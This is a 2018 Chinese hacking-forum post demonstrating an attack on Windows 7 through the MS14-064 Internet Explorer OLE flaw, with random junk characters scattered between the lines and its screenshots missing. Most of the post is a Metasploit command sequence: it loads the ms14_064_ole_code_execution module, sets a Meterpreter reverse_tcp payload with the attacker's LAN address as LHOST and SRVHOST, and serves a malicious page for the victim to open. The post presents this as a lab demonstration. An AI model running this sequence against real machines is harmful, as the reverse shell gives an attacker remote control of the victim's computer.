找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1613|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

/ a/ ^$ v# D0 J$ b 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 $ M' a% A: O2 x' E6 Y/ J; M

& H% o6 O2 p$ E( l( c, q1 h4 q

' V8 G, c/ ?$ D 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: - l/ ?2 b2 \' E3 s( u3 I

" [4 M o7 [; H' O) u2 x1 i2 q) J+ p

" C+ z$ s, h7 Y 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 8 M; I2 h2 k# G5 A. z: S. `2 M' W- P

- h" f4 z8 [5 X1 W4 [, k7 j

0 o- w2 b& [; u! I6 D2 \             set AllowPowershellPrompt true& e8 r! h/ v; | h4 B- T! `1 P! b* M

9 c9 b$ b. P# h, D; a8 h; t2 `

1 V6 M. {# A) y- o( U             Set LHOST 192.168.0.1097 n; k0 y; q/ b& D0 Q& W. L

& N* n& ^+ A, h( b; s5 h

( l2 w5 M" ? ~% |8 a* o7 e! ^             set SRVHOST 192.168.0.109 5 T9 j$ Q2 u+ p& T, j- V

b1 b+ W; Z" h2 R

3 Y t. m1 N7 ]+ M! d             Set uripath share + ^& k) I1 b* o3 j

# B$ J* j! v9 H2 u/ S9 l H- W

& k% T, |& \+ I             Set srvport 806 @/ D- B. U1 X

. I: ^* A& Z9 [9 u

% X* v3 {3 P5 M* y   $ T( U4 y9 R |* U

( _3 C7 k% q/ v! Y+ m4 w

; [! @5 j+ B I7 {% H   6 T' ^* {. J" ]6 ^! @

; f4 _8 G4 i) B: c5 e2 S

* R- l1 K d4 t4 t2 |+ \   / f0 S( }' [6 s6 d

4 u ^5 ?$ p( q# ~$ ?, C: A2 z* Z s

. J5 `% C1 b& _. w. [9 g" ~% c   . z& r! [1 q/ Z

& c# U4 p4 Z' [; G" f# R g1 f% z

! S/ L/ X1 o) O7 [5 T. A q   R% ~- ?; X+ }# {: {/ T2 G

* }% ]0 u% ~* z, k B `) {( |

; R3 W2 ^+ ] s1 i$ Q 下面我们来访问本地地址如图: " y5 i8 v# Y9 |) v1 p

4 Q9 @7 e, n) X$ ^

$ E4 J+ _) k0 h$ U0 A' i1 m  2 V" J: c4 ^; @% m8 R9 B/ k$ ]$ s5 s

6 S- u, O" z2 _

5 n) W$ d) [/ F   " Y2 c M* V6 |7 f3 p& }

/ Y: S2 B) h( d" t( r- C

+ y/ B: Y5 D# W$ r( i + i3 h, `7 L0 X8 z% g3 A

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表